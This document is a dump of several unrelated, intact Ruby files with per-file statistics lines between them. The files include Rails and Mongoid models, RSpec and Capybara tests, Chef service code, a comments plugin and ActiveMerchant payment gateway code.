class FenestrationConstruction include Mongoid::Document include Mongoid::Timestamps field :name, type: String field :fenestration_type, type: String field :fenestration_product_type, type: String field :assembly_context, type: String field :certification_method, type: String field :skylight_glazing, type: String field :skylight_curb, type: String field :operable_window_configuration, type: String field :greenhouse_garden_window, type: Integer field :fenestration_framing, type: String field :fenestration_panes, type: String field :glazing_tint, type: String field :window_divider, type: String field :diffusing, type: Integer field :shgc, type: Float field :shgc_center_of_glass, type: Float field :u_factor, type: Float field :u_factor_center_of_glass, type: Float field :visible_transmittance, type: Float field :visible_transmittance_center_of_glass, type: Float belongs_to :project def self.children_models children = [ ] end def self.xml_fields xml_fields = [ { db_field_name: 'name', xml_field_name: 'Name' }, { db_field_name: 'fenestration_type', xml_field_name: 'FenType' }, { db_field_name: 'fenestration_product_type', xml_field_name: 'FenProdType' }, { db_field_name: 'assembly_context', xml_field_name: 'AssmContext' }, { db_field_name: 'certification_method', xml_field_name: 'CertificationMthd' }, { db_field_name: 'skylight_glazing', xml_field_name: 'SkyltGlz' }, { db_field_name: 'skylight_curb', xml_field_name: 'SkyltCurb' }, { db_field_name: 'operable_window_configuration', xml_field_name: 'OperableWinConfiguration' }, { db_field_name: 'greenhouse_garden_window', xml_field_name: 'GreenhouseGardenWin' }, { db_field_name: 'fenestration_framing', xml_field_name: 'FenFrm' }, { db_field_name: 'fenestration_panes', xml_field_name: 'FenPanes' }, { db_field_name: 'glazing_tint', xml_field_name: 'GlzTint' }, { db_field_name: 'window_divider', xml_field_name: 'WinDivider' }, { db_field_name: 'diffusing', xml_field_name: 'Diffusing' }, { db_field_name: 'shgc', xml_field_name: 'SHGC' }, { db_field_name: 'shgc_center_of_glass', xml_field_name: 'SHGCCOG' }, { db_field_name: 'u_factor', xml_field_name: 'UFactor' }, { db_field_name: 'u_factor_center_of_glass', xml_field_name: 'UFactorCOG' }, { db_field_name: 'visible_transmittance', xml_field_name: 'VT' }, { db_field_name: 'visible_transmittance_center_of_glass', xml_field_name: 'VTCOG' } ] end # This method is autogenerated. Do not change directly. def to_sdd_xml(meta, xml) xml.send(meta[:xml_name]) do self.class.xml_fields.each do |field| if self[field[:db_field_name]] if self[field[:db_field_name]].is_a? Array logger.debug 'Translating to XML and the object is an Array' self[field[:db_field_name]].each_with_index do |instance, index| xml.send(:"#{field[:xml_field_name]}", instance, 'index' => index) end else xml.send(:"#{field[:xml_field_name]}", self[field[:db_field_name]]) end end end # go through children if they have something to add, call their methods kids = self.class.children_models unless kids.nil? || kids.empty? kids.each do |k| models = send(k[:model_name].pluralize) models.each do |m| m.to_sdd_xml(k, xml) end end end end end # This method is autogenerated. Do not change directly. # Take the map of model name and xml name, and the hash (from the XML). def self.from_sdd_json(meta, h) o = nil if meta && h self_model = meta[:model_name].camelcase(:upper).constantize o = self_model.create_from_sdd_json(meta, h) if o o.create_children_from_sdd_json(meta, h) o.save! 
o.reload # in case of relationships being updated else fail "Could not create instance of #{self_model} for #{meta[:model_name]}" end end o end # This method is autogenerated. Do not change directly. def self.create_from_sdd_json(meta, h) new_h = {} # Find fields as defined by the XML self_model = meta[:model_name].camelcase(:upper).constantize self_model.xml_fields.each do |field| if h[field[:xml_field_name]] logger.debug "Field Data Type: #{self_model.fields[field[:db_field_name]].options[:type]}" if self_model.fields[field[:db_field_name]].options[:type].to_s == 'Array' logger.debug 'Data model has an array as the field' # check if the hash has an array, otherwise make it an array if h[field[:xml_field_name]].is_a? Array logger.debug 'XML/JSON field is already an Array' new_h[field[:db_field_name]] = h[field[:xml_field_name]] else new_h[field[:db_field_name]] = [h[field[:xml_field_name]]] end else new_h[field[:db_field_name]] = h[field[:xml_field_name]] end end end # new_h can be empty if the xml has no fields, but still create the object o = self_model.new(new_h) o end # This method is autogenerated. Do not change directly. def create_children_from_sdd_json(meta, h) # Go through the children self_model = meta[:model_name].camelcase(:upper).constantize kids = self_model.children_models unless kids.nil? || kids.empty? kids.each do |k| # check if the kids have a json object at this level if h[k[:xml_name]] logger.debug "XML child is #{k[:xml_name]}" logger.debug "Model name is #{k[:model_name]}" if h[k[:xml_name]].is_a? Array logger.debug "#{k[:xml_name]} is an array, will add all the objects" h[k[:xml_name]].each do |h_instance| klass = k[:model_name].camelcase(:upper).constantize if klass.respond_to? :from_sdd_json model = klass.from_sdd_json(k, h_instance) # Assign the foreign key on the object model["#{meta[:model_name]}_id"] = id model.save! else logger.warn "Class #{klass} does not have instance method 'from_sdd_json'" end end elsif h[k[:xml_name]].is_a? Hash logger.debug "#{k[:xml_name]} is a single object, will add only one" klass = k[:model_name].camelcase(:upper).constantize if klass.respond_to? :from_sdd_json model = klass.from_sdd_json(k, h[k[:xml_name]]) # Assign the foreign key on the object model["#{meta[:model_name]}_id"] = id model.save! else logger.warn "Class #{klass} does not have instance method 'from_sdd_json'" end end end end end end def fenestration_type_enums %w(VerticalFenestration Skylight) end def assembly_context_enums %w(Manufactured FieldFabricated SiteBuilt) end def operable_window_configuration_enums [ '- specify -', 'CasementAwning', 'Sliding' ] end def window_divider_enums [ '- specify -', 'TrueDividedLite', 'DividerBtwnPanesLessThan7_16in', 'DividerBtwnPanesGreaterThanOrEqualTo7_16in' ] end end
36.292683
101
0.649328
b964d9e2d722025512ce0ba225bfb80fc64e0428
1751
describe 'Chooser expected behaviors', js: true do
  context 'when using the chooser' do
    before do
      login
      visit new_permission_path

      find('#collection_option_selected').click()
    end

    it 'does not click the + button when pressing enter in the left filter box' do
      fill_in('from-filter', with: '\n')

      expect(page).to have_select('Selected Collections', options: [])
    end

    it 'does not click the + button when pressing enter in the right filter box' do
      fill_in('to-filter', with: '\n')

      expect(page).to have_select('Selected Collections', options: [])
    end
  end

  context 'when selecting a collection in the chooser' do
    before do
      ingest_response, concept_response_1 = publish_collection_draft
      @entry_id_1 = "#{concept_response_1.body['ShortName']}_#{concept_response_1.body['Version']} | #{concept_response_1.body['EntryTitle']}"

      login
      visit new_permission_path

      find('#collection_option_selected').click()

      within '#collectionsChooser' do
        select(@entry_id_1, from: 'Available Collections')

        find('.add_button').click
      end
    end

    it 'does not highlight an entry in the right column after using +/-' do
      expect(page).to have_select('Selected Collections', options: [@entry_id_1], selected: [])
      expect(page).to have_no_content('You must select at least 1 collection.')
    end

    it 'does not have an entry highlighted after filling in the filter' do
      within '#collectionsChooser' do
        select(@entry_id_1, from: 'Selected Collections')
      end

      fill_in('to-filter', with: @entry_id_1)

      expect(page).to have_select('Selected Collections', options: [@entry_id_1], selected: [])
    end
  end
end
35.734694
142
0.680183
e814bd5ab5b9bda92a7a6f765c3ba18ca218142c
41
div.this_is do
 span.in_a_file render
end
13.666667
22
0.829268
2629620604e3d10c129e2c3804280e74688e8f93
2517
# -*- encoding: utf-8 -*-
# stub: webpacker 5.2.1 ruby lib

Gem::Specification.new do |s|
  s.name = "webpacker".freeze
  s.version = "5.2.1"

  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.metadata = { "changelog_uri" => "https://github.com/rails/webpacker/blob/v5.2.1/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/webpacker/tree/v5.2.1" } if s.respond_to? :metadata=
  s.require_paths = ["lib".freeze]
  s.authors = ["David Heinemeier Hansson".freeze, "Gaurav Tiwari".freeze]
  s.date = "2020-08-17"
  s.email = ["[email protected]".freeze, "[email protected]".freeze]
  s.homepage = "https://github.com/rails/webpacker".freeze
  s.licenses = ["MIT".freeze]
  s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze)
  s.rubygems_version = "2.7.6.2".freeze
  s.summary = "Use webpack to manage app-like JavaScript modules in Rails".freeze

  s.installed_by_version = "2.7.6.2" if s.respond_to? :installed_by_version

  if s.respond_to? :specification_version then
    s.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_runtime_dependency(%q<activesupport>.freeze, [">= 5.2"])
      s.add_runtime_dependency(%q<railties>.freeze, [">= 5.2"])
      s.add_runtime_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"])
      s.add_runtime_dependency(%q<semantic_range>.freeze, [">= 2.3.0"])
      s.add_development_dependency(%q<bundler>.freeze, [">= 1.3.0"])
      s.add_development_dependency(%q<rubocop>.freeze, ["< 0.69"])
      s.add_development_dependency(%q<rubocop-performance>.freeze, [">= 0"])
    else
      s.add_dependency(%q<activesupport>.freeze, [">= 5.2"])
      s.add_dependency(%q<railties>.freeze, [">= 5.2"])
      s.add_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"])
      s.add_dependency(%q<semantic_range>.freeze, [">= 2.3.0"])
      s.add_dependency(%q<bundler>.freeze, [">= 1.3.0"])
      s.add_dependency(%q<rubocop>.freeze, ["< 0.69"])
      s.add_dependency(%q<rubocop-performance>.freeze, [">= 0"])
    end
  else
    s.add_dependency(%q<activesupport>.freeze, [">= 5.2"])
    s.add_dependency(%q<railties>.freeze, [">= 5.2"])
    s.add_dependency(%q<rack-proxy>.freeze, [">= 0.6.1"])
    s.add_dependency(%q<semantic_range>.freeze, [">= 2.3.0"])
    s.add_dependency(%q<bundler>.freeze, [">= 1.3.0"])
    s.add_dependency(%q<rubocop>.freeze, ["< 0.69"])
    s.add_dependency(%q<rubocop-performance>.freeze, [">= 0"])
  end
end
48.403846
198
0.656337
e9b3f73a7cdf46e05c661c3ef2d7eba7295967e7
142
#
# Cookbook:: build_cookbook
# Recipe:: smoke
#
# Copyright:: 2017, Dru Goradia, All Rights Reserved.

include_recipe 'delivery-truck::smoke'
20.285714
53
0.739437
5d48649efab5f86799d64139a9209c9b8a8d2c8d
3897
require_dependency 'application_controller'

class CommentsExtension < Radiant::Extension
  version "0.0.5"
  description "Adds blog-like comments and comment functionality to pages."
  url "http://github.com/ntalbott/radiant-comments/tree/master"

  define_routes do |map|
    map.with_options(:controller => 'admin/comments') do |comments|
      comments.destroy_unapproved_comments '/admin/comments/unapproved/destroy', :action => 'destroy_unapproved', :conditions => {:method => :delete}
      comments.destroy_spam_comments '/admin/comments/spam/destroy', :action => 'destroy_spam', :conditions => {:method => :delete}
      comments.connect 'admin/comments/:status', :status => /all|approved|unapproved|spam/, :conditions => { :method => :get }
      comments.connect 'admin/comments/:status.:format'
      comments.connect 'admin/pages/:page_id/comments/:status.:format'
      comments.connect 'admin/pages/:page_id/comments/all.:format'
      comments.resources :comments, :path_prefix => "/admin", :name_prefix => "admin_", :member => {:approve => :get, :unapprove => :get, :is_spam => :get}
      comments.admin_page_comments 'admin/pages/:page_id/comments/:action'
      comments.admin_page_comment 'admin/pages/:page_id/comments/:id/:action'
    end
    # This needs to be last, otherwise it hoses the admin routes.
    map.resources :comments, :name_prefix => "page_", :path_prefix => "*url", :controller => "comments"
  end

  def activate
    Page.send :include, CommentTags
    Comment
    Page.class_eval do
      has_many :comments, :dependent => :destroy, :order => "created_at ASC"
      has_many :approved_comments, :class_name => "Comment", :conditions => "comments.approved_at IS NOT NULL", :order => "created_at ASC"
      has_many :unapproved_comments, :class_name => "Comment", :conditions => "comments.approved_at IS NULL", :order => "created_at ASC"
      attr_accessor :last_comment
      attr_accessor :selected_comment

      def has_visible_comments?
        !(approved_comments.empty? && selected_comment.nil?)
      end
    end

    if admin.respond_to? :page
      admin.page.edit.add :parts_bottom, "edit_comments_enabled", :before => "edit_timestamp"
      admin.page.index.add :sitemap_head, "index_head_view_comments"
      admin.page.index.add :node, "index_view_comments"
    end
    admin.tabs.add "Comments", "/admin/comments/unapproved", :visibility => [:all]

    begin
      {
        'notification' => 'false',
        'notification_from' => '',
        'notification_to' => '',
        'notification_site_name' => '',
        'notify_creator' => 'true',
        'notify_updater' => 'false',
        'akismet_key' => '',
        'akismet_url' => '',
        'mollom_privatekey' => '',
        'mollom_publickey' => '',
        'filters_enabled' => 'true',
        'auto_approve' => 'true'
      }.each{|k,v| Radiant::Config.create(:key => "comments.#{k}", :value => v) unless Radiant::Config["comments.#{k}"]}
    rescue Exception => e
      puts e
    end

    require "fastercsv"
    ActiveRecord::Base.class_eval do
      def self.to_csv(*args)
        find(:all).to_csv(*args)
      end

      def export_columns(format = nil)
        self.class.content_columns.map(&:name) - ['created_at', 'updated_at']
      end

      def to_row(format = nil)
        export_columns(format).map { |c| self.send(c) }
      end
    end

    Array.class_eval do
      def to_csv(options = {})
        return "" if first.nil?
        if all? { |e| e.respond_to?(:to_row) }
          header_row = first.export_columns(options[:format]).to_csv
          content_rows = map { |e| e.to_row(options[:format]) }.map(&:to_csv)
          ([header_row] + content_rows).join
        else
          FasterCSV.generate_line(self, options)
        end
      end
    end
  end

  def deactivate
  end
end
38.205882
149
0.634591
abc1ea722a1e8676182f5d28f538c60706d08f52
866
require 'test_helper'

class LiqpayHelperTest < Test::Unit::TestCase
  include ActiveMerchant::Billing::Integrations

  def setup
    @helper = Liqpay::Helper.new(1234, 'merch1', :amount => 500, :currency => 'USD')
  end

  def test_basic_helper_fields
    assert_field 'merchant_id', 'merch1'
    assert_field 'amount', '500'
    assert_field 'order_id', '1234'
    assert_field 'currency', 'USD'
    assert_field 'version', '1.1'
  end

  def test_description
    @helper.description 'This is my description'
    assert_field 'description', 'This is my description'
  end

  def test_notify_url
    @helper.notify_url 'http://example.com/notify'
    assert_field 'server_url', 'http://example.com/notify'
  end

  def test_return_url
    @helper.return_url 'http://example.com/return'
    assert_field 'result_url', 'http://example.com/return'
  end
end
25.470588
84
0.699769
7a7b2a1c402aad316b1b7f23a1ce17945744bb37
2514
#
# Author:: AJ Christensen (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

require 'chef/provider/service/init'

class Chef
  class Provider
    class Service
      class Redhat < Chef::Provider::Service::Init

        CHKCONFIG_ON = /\d:on/
        CHKCONFIG_MISSING = /No such/

        def initialize(new_resource, run_context)
          super
          @init_command = "/sbin/service #{@new_resource.service_name}"
          @new_resource.supports[:status] = true
          @service_missing = false
        end

        def define_resource_requirements
          shared_resource_requirements

          requirements.assert(:all_actions) do |a|
            chkconfig_file = "/sbin/chkconfig"
            a.assertion { ::File.exists? chkconfig_file }
            a.failure_message Chef::Exceptions::Service, "#{chkconfig_file} does not exist!"
          end

          requirements.assert(:start, :enable, :reload, :restart) do |a|
            a.assertion { !@service_missing }
            a.failure_message Chef::Exceptions::Service, "#{@new_resource}: unable to locate the init.d script!"
            a.whyrun "Assuming service would be disabled. The init script is not presently installed."
          end
        end

        def load_current_resource
          super

          if ::File.exists?("/sbin/chkconfig")
            chkconfig = shell_out!("/sbin/chkconfig --list #{@current_resource.service_name}", :returns => [0,1])
            @current_resource.enabled(!!(chkconfig.stdout =~ CHKCONFIG_ON))
            @service_missing = !!(chkconfig.stderr =~ CHKCONFIG_MISSING)
          end

          @current_resource
        end

        def enable_service()
          shell_out! "/sbin/chkconfig #{@new_resource.service_name} on"
        end

        def disable_service()
          shell_out! "/sbin/chkconfig #{@new_resource.service_name} off"
        end
      end
    end
  end
end
33.52
113
0.648369
01bcc9f35fea0afb7bfceb3d3989dd37b0af2630
1333
require File.expand_path('../boot', __FILE__)

# Pick the frameworks you want:
require "active_model/railtie"
require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "sprockets/railtie"
# require "rails/test_unit/railtie"

# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)

module HipsterCi
  class Application < Rails::Application
    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.

    # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
    # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
    # config.time_zone = 'Central Time (US & Canada)'

    # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
    # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
    # config.i18n.default_locale = :de

    config.autoload_paths << 'lib/'

    config.default_project_access_token = ENV['DEFAULT_PROJECT_ACCESS_TOKEN']
  end
end
38.085714
99
0.744936
1d67f83c6b1dc20fc805962d3fa0c94f3632b1c0
306
# frozen_string_literal: true

class CreateComments < ActiveRecord::Migration[6.0]
  def change
    create_table :comments do |t|
      t.references :user, null: false, foreign_key: true
      t.references :post, null: false, foreign_key: true
      t.string :content

      t.timestamps
    end
  end
end
21.857143
56
0.689542
21922940277e7efd9da83f2a9da043f4b2728efa
6569
require "nokogiri"

module ActiveMerchant #:nodoc:
  module Billing #:nodoc:
    class WorldpayUsGateway < Gateway
      class_attribute :backup_url

      self.display_name = "Worldpay US"
      self.homepage_url = "http://www.worldpay.com/us"

      # No sandbox, just use test cards.
      self.live_url = 'https://trans.worldpay.us/cgi-bin/process.cgi'
      self.backup_url = 'https://trans.gwtx01.com/cgi-bin/process.cgi'

      self.supported_countries = ['US']
      self.default_currency = 'USD'
      self.money_format = :dollars
      self.supported_cardtypes = [:visa, :master, :american_express, :discover, :jcb]

      def initialize(options={})
        requires!(options, :acctid, :subid, :merchantpin)
        super
      end

      def purchase(money, payment_method, options={})
        post = {}
        add_invoice(post, money, options)
        add_payment_method(post, payment_method)
        add_customer_data(post, options)

        commit('purchase', options, post)
      end

      def authorize(money, payment, options={})
        post = {}
        add_invoice(post, money, options)
        add_credit_card(post, payment)
        add_customer_data(post, options)

        commit('authorize', options, post)
      end

      def capture(amount, authorization, options={})
        post = {}
        add_invoice(post, amount, options)
        add_reference(post, authorization)
        add_customer_data(post, options)

        commit('capture', options, post)
      end

      def refund(amount, authorization, options={})
        post = {}
        add_invoice(post, amount, options)
        add_reference(post, authorization)
        add_customer_data(post, options)

        commit("refund", options, post)
      end

      def void(authorization, options={})
        post = {}
        add_reference(post, authorization)
        commit('void', options, post)
      end

      def verify(credit_card, options={})
        MultiResponse.run(:use_first_response) do |r|
          r.process { authorize(100, credit_card, options) }
          r.process(:ignore_result) { void(r.authorization, options) }
        end
      end

      private

      def url(options)
        options[:use_backup_url].to_s == "true" ? self.backup_url : self.live_url
      end

      def add_customer_data(post, options)
        if(billing_address = (options[:billing_address] || options[:address]))
          post[:ci_companyname] = billing_address[:company]
          post[:ci_billaddr1] = billing_address[:address1]
          post[:ci_billaddr2] = billing_address[:address2]
          post[:ci_billcity] = billing_address[:city]
          post[:ci_billstate] = billing_address[:state]
          post[:ci_billzip] = billing_address[:zip]
          post[:ci_billcountry] = billing_address[:country]

          post[:ci_phone] = billing_address[:phone]
          post[:ci_email] = billing_address[:email]
          post[:ci_ipaddress] = billing_address[:ip]
        end

        if(shipping_address = options[:shipping_address])
          post[:ci_shipaddr1] = shipping_address[:address1]
          post[:ci_shipaddr2] = shipping_address[:address2]
          post[:ci_shipcity] = shipping_address[:city]
          post[:ci_shipstate] = shipping_address[:state]
          post[:ci_shipzip] = shipping_address[:zip]
          post[:ci_shipcountry] = shipping_address[:country]
        end
      end

      def add_invoice(post, money, options)
        post[:amount] = amount(money)
        post[:currencycode] = (options[:currency] || currency(money))
        post[:merchantordernumber] = options[:order_id] if options[:order_id]
      end

      def add_payment_method(post, payment_method)
        if card_brand(payment_method) == 'check'
          add_check(post, payment_method)
        else
          add_credit_card(post, payment_method)
        end
      end

      def add_credit_card(post, payment_method)
        post[:ccname] = payment_method.name
        post[:ccnum] = payment_method.number
        post[:cvv2] = payment_method.verification_value
        post[:expyear] = format(payment_method.year, :four_digits)
        post[:expmon] = format(payment_method.month, :two_digits)
      end

      ACCOUNT_TYPES = {
        "checking" => "1",
        "savings" => "2",
      }

      def add_check(post, payment_method)
        post[:action] = 'ns_quicksale_check'
        post[:ckacct] = payment_method.account_number
        post[:ckaba] = payment_method.routing_number
        post[:ckno] = payment_method.number
        post[:ckaccttype] = ACCOUNT_TYPES[payment_method.account_type] if ACCOUNT_TYPES[payment_method.account_type]
      end

      def split_authorization(authorization)
        historyid, orderid = authorization.split("|")
        [historyid, orderid]
      end

      def add_reference(post, authorization)
        historyid, orderid = split_authorization(authorization)
        post[:postonly] = historyid
        post[:historykeyid] = historyid
        post[:orderkeyid] = orderid
      end

      def parse(xml)
        response = {}
        doc = Nokogiri::XML(xml)
        message = doc.xpath("//plaintext")
        message.text.split(/\r?\n/).each do |line|
          key, value = line.split(%r{=})
          response[key] = value if key
        end
        response
      end

      ACTIONS = {
        "purchase" => "ns_quicksale_cc",
        "refund" => "ns_credit",
        "authorize" => "ns_quicksale_cc",
        "capture" => "ns_quicksale_cc",
        "void" => "ns_void",
      }

      def commit(action, options, post)
        post[:action] = ACTIONS[action] unless post[:action]
        post[:acctid] = @options[:acctid]
        post[:subid] = @options[:subid]
        post[:merchantpin] = @options[:merchantpin]

        post[:authonly] = '1' if action == 'authorize'

        raw = parse(ssl_post(url(options), post.to_query))

        succeeded = success_from(raw['result'])
        Response.new(
          succeeded,
          message_from(succeeded, raw),
          raw,
          :authorization => authorization_from(raw),
          :test => test?
        )
      end

      def success_from(result)
        result == '1'
      end

      def message_from(succeeded, response)
        if succeeded
          "Succeeded"
        else
          (response['transresult'] || response['Reason'] || "Unable to read error message")
        end
      end

      def authorization_from(response)
        [response['historyid'], response['orderid']].join("|")
      end
    end
  end
end
31.280952
116
0.606485
287d13b14ebc16968a433b4f372fd67a73517a4e
1413
=begin
#Topological Inventory

#Topological Inventory

The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.2.1

=end

require 'spec_helper'
require 'json'
require 'date'

# Unit tests for TopologicalInventoryApiClient::CollectionMetadata
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'CollectionMetadata' do
  before do
    # run before each test
    @instance = TopologicalInventoryApiClient::CollectionMetadata.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of CollectionMetadata' do
    it 'should create an instance of CollectionMetadata' do
      expect(@instance).to be_instance_of(TopologicalInventoryApiClient::CollectionMetadata)
    end
  end

  describe 'test attribute "count"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "limit"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "offset"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
26.166667
102
0.745223
ff3be0ec0813fae3a355fc2079eb73e8cae2ee2e
443
=begin
#Aspose.ThreeD Cloud API Reference

#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)

OpenAPI spec version: 3.0

Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.11-SNAPSHOT

=end

require 'date'

module AsposeThreeDCloud
  class DracoCompressionLevel
    NoCompression = 0,
    Fast =1,
    Standard = 2,
    Optimal = 3
  end
end
15.821429
102
0.740406
ac82951bcad3814cec26dd0cf87f5580d130de0f
784
# frozen_string_literal: true

require 'spec_helper'

RSpec.describe EE::BulkImports::Groups::Graphql::GetEpicsQuery do
  it 'has a valid query' do
    context = BulkImports::Pipeline::Context.new(create(:bulk_import_tracker))

    result = GitlabSchema.execute(
      described_class.to_s,
      variables: described_class.variables(context)
    ).to_h

    expect(result['errors']).to be_blank
  end

  describe '#data_path' do
    it 'returns data path' do
      expected = %w[data group epics nodes]

      expect(described_class.data_path).to eq(expected)
    end
  end

  describe '#page_info_path' do
    it 'returns pagination information path' do
      expected = %w[data group epics page_info]

      expect(described_class.page_info_path).to eq(expected)
    end
  end
end
23.757576
78
0.710459
085be46734cecd31d667a3840c79a27cc6ed9e31
74
module Backbone
  module NestedAttributes
    VERSION = "0.5.0"
  end
end
12.333333
25
0.702703